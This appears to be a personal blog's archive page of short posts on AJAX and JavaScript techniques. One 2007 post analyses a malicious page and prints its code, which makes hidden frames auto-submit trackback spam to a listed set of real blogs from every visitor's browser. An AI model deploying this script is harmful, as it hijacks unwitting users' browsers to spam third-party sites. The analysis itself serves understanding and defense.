Google
 

New AJAX Search for PublicDomainReprints.org

March 30, 2008 – 11:05 pm

Over the weekend I coded up a new BETA search function for PublicDomainReprints.org which uses Google’s AJAX Search API. This new search (which can be found here), lets people search for more public domain books and request reprints without leaving the site. The original search is still available on the same page (it works by redirecting people to the original archive).

In the works: hard cover support, archival quality reprints, splitting of large volumes, and more!

Spreading Comment and Trackback Spam Through Zombie Browsers

August 7, 2007 – 11:57 am

Since my move to Wordpress, I have been noticing a lot of funny track back hits going back to my old Movable Type installation. First of all, all of these hits were coming back from different IP addresses and different browsers. Second, they all had the same refer. Something was fishy. On further examination, I found something really interesting

It seems that the refer is hosting a malicious HTML page. That page consists of a set of Javascripts which load new frames and submit track back pings to other blogs on the Internet. That means that anyone going to that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the refer and end up on the malicios page, which then submits more track back spams in the background. The track backs themselves lead to fake blogs and search results, which eventually either lead to drug stores or ad-populated pages.

There are several interesting things here. First - the malicious page kind of propagates itself. Second, the page does not use any kind of security exploits - everything is done through regular Javascripts. Third, there is apparently enough interest in refers that it generates enough traffic to affect other sites. All of these is very similar to the way regular spam and viruses are spread - through zombie computers, except in this case the browsers are zombies.

Below are some snippets from the code of this site (you can view the decoded site source here - courtesy of Stephane “Gooby” Theroux’s decoder):

First the site loads an array with the target track back URLs:

var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');

The next step is to create the frames and forms inside:


var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();

Third step is to load up the forms and submit:


function tbsp()
{
var d = parent.fr1.document;
d.getElementById('tbdescr').innerHTML = ii ': ' unescape(ss[ii]);
d.fff.action = unescape(ss[ii]);
d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
d.fff.title.value = unescape('Diphtheria');
d.fff.excerpt.value = 'Read more about ' unescape('Diphtheria');
d.fff.blogname.value = unescape('Diphtheria');
d.fff.submit();
...

Fourth step - rinse, repeat:


if (ii > 0) {
ii--;
setTimeout('tbsp()', 10000);
} else {
setTimeout('refresh()', 2000);
}

The reason why this is allowed to happen is due to the fact that the browser does not restrict interaction with child frames. Thus, dynamically created frames with malicious form submits can happen without user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of Web service or web application that can accept GET or POST. In fact it would probably be trivial but most social networks and web applications should filter out Javascript.

At the current time there is no protection against this type of attack other than disabling Javascript or having the browser warn you before submitting a form.

Comments are welcome at blog /at/ shaftek [dot] org.

An Ajax Search Engine Without Servers (Almost)

July 10, 2007 – 10:40 pm

For a while I have been working on a hobby project trying to make a meta-search engine that you can use to search multiple search engines by tag. The catch? No server side components. This search engine works client side only from the user’s browser by using RSS feeds from search engines and Google’s AJAX Feed API to access them from the client browser.

The engine is called “ShafTag” and can be found at www.shaftag.com.

Comments are welcome at code /at/ shaftek [dot] org.

Reverse Resolution of IP Addresses with AJAX

June 21, 2006 – 1:40 pm

One of the things that came up recently at work is a way to resolve IP addresses to hostnames client-side without any server calls. Here are some of the possibilites that I thought off :

o Using Javascript to call Java’s java.net.InetAddress class to resolve (only works in Mozilla and Opera, needs security permissions)
o Using a Java Applet calling the same class and accessing it via JavaScript / LiveConnect (works in IE also, needs a signed applet)
o Using XUL (Mozilla only, only hostname to IP)
o Trying to call Flash via this bridge (needs a flash movie)

So the bottom line is that it is not possible without a server side process or a signed applet.

Saving and Loading Files from Web Pages via AJAX

February 16, 2006 – 2:32 pm

I recently ran across a nifty project called “TiddlyWiki”. One of the things that struct me as interesting features from the programming point of view is the fact that it is able to load and save itself to the user’s hard drive using Javascript without any kind of server side support. After digging more into the source code (which is licensed under a BSD license), it seems pretty straight forward and simple and I am going to describe it in this post (WARNING: all this code is based on the TiddlyWiki code covered under BSD license (for full license terms, see their website).

The trick to saving and opening data in Javascript is not using Javascript :) Rather this particular hack relies on browser-specific functionality, but it just happens to be that IE, Mozilla AND Opera all expose this functionality via three differents ways. Here is how to save files in IE relying on the Scripting.FileSystemObject functionality:

var fso = new ActiveXObject("Scripting.FileSystemObject");
var file = fso.OpenTextFile(filePath,2,-1,0);
file.Write(content);
file.Close();

In Mozilla, the trick is to use two XUL interfaces called “mozilla.org/file/local” and “mozilla.org/network/file-output-stream”:

netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.nterfaces.nsILocalFile);
file.initWithPath(filePath);
if (!file.exists())
file.create(0, 0664);
var out = Components.classes["@mozilla.org/network/file-output-stream;1"].createInstance(Components.nterfaces.nsIFileOutputStream);
out.init(file, 0x20 | 0x02, 00004,null);
out.write(content, content.length);
out.flush();
out.close();

In Opera, this is done by interfacing to the Java Core API via Javascript:

var s = new java.io.PrintStream(new java.io.FileOutputStream(operaUrlToFilename(filePath)));
s.print(content);
s.close();

DESKTOP APPS BUILT LIKE THE WEB

One of the upcoming big technologies in Microsoft’s new OS (”Windows Vista”) is XAML - an XML language for defining user interfaces. Mozilla also has a similar one called XUL. All of these are trying to accomplish the same thing - make rich applications run on the desktop while let developers write them like web applications. Microsoft in particular is being driven by the biggest threat to their proprietary Windows OS “cash cow” they have ever seen - the Web. As Joel Spolsky puts it: “… suddenly, Microsoft’s API doesn’t matter so much. Web applications don’t require Windows”. Mozilla was motivated by a need to easily write cross-platform code (ironically the exact opposite of what drives Microsoft). But the end result was still pretty much the same - full-featured desktop apps written in markup instead of compiled code.

WEB APPS THAT RUN LIKE DESKTOP APPS

While this has happening, a second major technology has been brewing for a while - Ajax. Using JavaScript and XML instead of proprietary technologies like Flash and browser-specific extensions like ActiveX, this new approach to web development allowed for new innovative applications running on the web that in many cases looked and felt like desktop applications. Lead by well known sites like gMail and Google Maps, it took the Internet by storm. The prime drive was to make web applications run and feel like desktop applications while still running on the Web and being developed like regular web sites with markup and open standards such as XHTML, CSS and JavaScript. And the standards involved are still being improved by the likes of W3C and WHATWG to make these work better and faster.

A third major development has just recently begun as well - widgets. Microsoft’s Live.com, Google’s homepage service as well as lots of other “Ajax Homepages” have been popping up as of late. All of these offer a web desktop extensible enough so custom widgets can be added to them. The actual widgets are Ajax pieces - basically HTML with CSS and JavaScript running in very small windows and under certain constraints (see Microsoft’s gadget list and Google’s for some examples).

WEB APPS ON DESKTOP

While widgets may be seen like mere toys and Ajax a raw technology, they are harbingers of something much more important yet to come - web applications that live on the desktop and the Web, and easily cross the path between both. Some first attempts at this have begun such as Microsoft’s plans to allow widgets to cross from Live.com to the desktop, Yahoo’s widgets that live on the desktop and Google’s sidebar plugins that can be written in JavaScript.

However, there is a next step. Overlooked by the giants of computer technology, the blogs and other media, is one small tiny project built by Jeremy Ruston - TiddlyWiki (a variant version called GTD Tiddly Wiki is more known in some circles). In the essence it is just a wiki like any other, but a closer look under the hood reveals otherwise. It is a self contained web application that can run from the web OR desktop, and save itself from the desktop to the web and vice-versa. All built with regular DHTML, CSS and JavaScript in a 120KB package of open standard goodness. It is the first example of what probably is going to be a flood of new desktop/web programs that run anywhere, communicate with anyone and are built using open standards without licensing fees.

THE GOLDEN GRAIL: WEB AND DESKTOP SEAMLESS

TiddlyWiki is not much to many of us but it foretells the golden grail of desktop/web integration - Sun’s old slogan: “The Network is the Computer”. In such future we should be able to login to any website in the world, have the ability to have the site run locally on our computer as an application and then save itself back to the web. The integration should be seamless and transparent and run on any platform. Or even better, perhaps it can also talk to other web applications out there. So for example, when I wake up in the morning to check my calendar, my web/desktop super-dooper scheduling applications can tell me if an appointment needs to be rescheduled because someone else is unable to make it after being notified by his scheduling app. I should also be able to save my desktop back to the web and access it from anywhere. With web services and open standards this is not far fetched.

That would also mean something else - XUL and XAML as well as other proprietary ways of accomplishing this goal will fall by the wayside. In their place we will have XHTML, CSS and JavaScript - all of which are open standards and will run on every platform. Instead of conventional software that is downloaded and installed, we just might end up only using a browser with everything else, desktop and web, running inside of it.

BookChaser: an Ajax Book Search Engine

May 26, 2005 – 1:19 am

A very long time ago (about five years) I had the bright idea of starting a new search engine like IMDB but for books. Eventually I purchased the BookChaser.com domain name and have held on to it ever since. At some point a bunch of people like me got together and formed the Internet Book Database Project. Unfortunatly, interest and other time constraints eventually disbanded out little group and nothing ever came of it.

Looking at the same idea after five years I suddenly see new hope. Two of the main problems all along have been is (1) getting all the book data and (2) getting enough money to run servers to store that data. Now looking at what’s out there including AJAX and Webservices for sites like Amazon, I suddenly see those problems solved. So here is a short summary of what I think BookChaser should look like (but unfortunatly I haven’t got the time to code it):

1. Full-AJAX application in HTML requireing no other servers.
2. Primary search is done against Amazon’s database via AWS and XmlHttpRequest with results displayed directly in the browser (I have done something similar for UPS’s XML API with AJAX).
3. Search against other book stores to retreive prices just like Book Burro does in FireFox.
4. Gets information from libraries based on LibraryLookup from John Udell.
5. Maybe even add Z39.50 support via some toolkit that calls Z39.50 gateways directly.
6. Add support for reviews via AllConsuming, IBList, and others.

The only downsides that I see with this approach is that all of this would run very slow in a browser and put a large load on all of the services involved. A better approach might be to provide some generic web services caching for these server side in some instances (but that would kill all of the fun).

UPDATE: I took some time and coded up a prototype. BookChaser v0.1 is available here and here. Leaves comments on this post OR send email to code \at\ shaftek {dot} org.

A Standalone Web Application

May 13, 2005 – 12:08 pm

This may sound kind of strange but I recently ran across a new web application that is not meant to be used over the web. Confused yet? Well this application is an HTML file with lots of complicated DOM/DHTML/CSS stuff that is meant to be used and saved on your regular computer. Reminds me of what Microsoft is planning for LongHorn with XAML.

Tracking UPS Packages via JavaScript

January 3, 2005 – 1:51 pm

A recent post at TechDigits about tracking UPS packages via RSS and web services got me thinking if the same is possible via Javascript and the XmlHttpRequest object (in IE and Mozilla). Since Google’s Gmail and Google Suggest started using that object, it has become more popular. So after some thinking, I put together the following quick and dirty code snippet:

req = new XMLHttpRequest();

var strXML = ‘<?xml version=\’1.0\’?>’ +
‘<AccessRequest xml:lang=\’en-US\’>’ +
‘<AccessLicenseNumber>YOURLICENSEKEY</AccessLicenseNumber>’ +
‘<UserId>YOURUSERNAME</UserId>’ +
‘<Password>YOURPASSWORD</Password>’ +
‘</AccessRequest>’ +
” +
‘<?xml version=\’1.0\’?>’ +
‘<TrackRequest xml:lang=\’en-US\’>’ +
‘<Request>’ +
‘<TransactionReference>’ +
‘<CustomerContext>sample</CustomerContext>’ +
‘<XpciVersion>1.0001</XpciVersion>’ +
‘</TransactionReference>’ +
‘<RequestAction>Track</RequestAction>’ +
‘<RequestOption>activity</RequestOption>’ +
‘</Request>’ +
‘<TrackingNumber>1Z12345E1512345676</TrackingNumber>’ +
‘</TrackRequest>’;
req.open(’POST’, ‘https://www.ups.com/ups.app/xml/Track’, false);
req.send(strXML);
document.write(req.responseText);

This code on Mozilla browsers will retreive and post the raw XML information (you do need the security information for UPS’s website to make it work which is a bit of a security flaw). Once you got the information, then you can parse it via Mozilla’s or IE’s XSLT processors, or via regular DOM methods after parsing it into a DOM tree as follows:

var parser = new DOMParser();
var doc = parser.parseFromString(req.responseText, “text/xml”);

For Mozilla browsers, you also need to request a security permission from the user in order to access UPS’s website. A web proxy might be an answer to that problem but in any case here is the code:

netscape.security.PrivilegeManager.enablePrivilege(”UniversalBrowserRead”);

I don’t know how useful this can be since the security information is exposed, but it is a nice hack.

Hiding Table Rows in DHTML

October 24, 2004 – 12:13 am

One of the more fun things in DHTML is dynamic manipulation of page content. An interesting question that recently came up at work was hiding and displaying a single table row. The solution I came up with is pretty simply - set the CSS STYLE tag of the table row to “display: none” to hide it and then set it to “display: table-row” to unhide it. The problem is that it won’t work in Internet Explorer, primarly due to the fact that the display property can be set to “table-row” only in CSS 2, not in CSS 1 where only “inline” or “block” is possible. Interner Explorer only supports CSS1 at this time.

So the logical solution would be to use “block” Unfortunatly, when using “block” for table rows in IE as recommended by Microsoft. HOWEVER, this will cause problems with non-Microsoft browsers if any cell inside such row uses COLSPAN. The solution - setting the display property to the display property of some other table row like this in Javascript:

hidden_row.style.display = visible_row.style.display;

You can try it out below, on IE ‘table-row’ will throw an error but everything else will work fine. On other browsers, the ‘block’ approach will not work:

Col 1 Col 2 Col 3

Changing Web Page Content on the Fly

October 12, 2004 – 6:31 pm

An interesting problem that comes up often is a need to change a part of a web page without reloading the entire page. This is especially true when dynamic content like a list needs to be generated from a database and included in the page. The solution to this is to do a dynamic Javascript include - programatically include a JavaScript file that can be generated dynamically, lets say by a servlet. The usual way to do that is via “document.write()” and include a “SCRIPT” tag in the web page. A more cleaner way is discussed in an article written by Moshe Moskowitz by DOM:

var scriptElement = document.createElement("script");
scriptElement.src = url;
scriptElement.type="text/javascript";
getObject('someSection').appendChild(scriptElement);

Now, what happens if your dynamic content generator also gives error pages in plain HTML? The code above will not work if an error occurs since the input provided will be HTML, not Javascript. So a workaround for this is to make the error pages do both JavaScript and HTML by adding the JavaScript code to the beginning of the HTML page and commenting it out with HTML comment tags. Then you can use JavaScript comment tags to comment out the HTML file itself. The result will execute JavaScript if included dynamically in a SCRIPT tag, and will show proper HTML (and even validate) if thrown in regular HTML processing. Here is a complete example with JavaScript content in red and HTML content in blue:

<!–
alert(’ERROR: Can’t find webpage [404]!’);
/*
–>
<HTML>
<BODY>
<H1>ERROR: Can’t find webpage [404]!</H1>
</BODY>
</HTML>
<!–
*/ // –>

The JavaScript code is enclosed in an HTML comment tag making it invisible by browsers. However, when executed as a JavaScript tag, it will execute until it hits a JavaScript comment tag “/*” which is ignored by browsers. The closing tag on the bottom and the followup “//” comment tag make sure that the JavaScript ignores the HTML content. BUT at the same time the two sets of HTML comment tags on the top and bottom make sure that the browser ignores all JavaScript code ignoring comment tags.